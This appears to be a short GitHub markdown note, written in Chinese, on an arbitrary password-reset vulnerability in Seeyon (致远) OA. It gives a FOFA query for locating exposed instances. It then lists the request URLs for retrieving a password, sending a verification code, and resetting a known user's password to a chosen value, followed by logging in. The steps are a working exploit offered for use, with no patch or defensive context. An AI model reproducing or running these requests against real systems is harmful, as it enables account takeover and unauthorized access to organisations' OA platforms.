Skip to content

Latest commit

 

History

History
27 lines (16 loc) · 1004 Bytes

致远前台任意用户密码修改.md

File metadata and controls

27 lines (16 loc) · 1004 Bytes

致远前台任意用户密码修改

fofa

app="致远互联-OA"

漏洞复现

前提需要知道用户名

http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword

image-20240301101704702

http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx

image-20240301101722837

修改密码为1qaz@WSX

http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX

image-20240301101802224

最后使用修改的密码登录

image-20240301101840756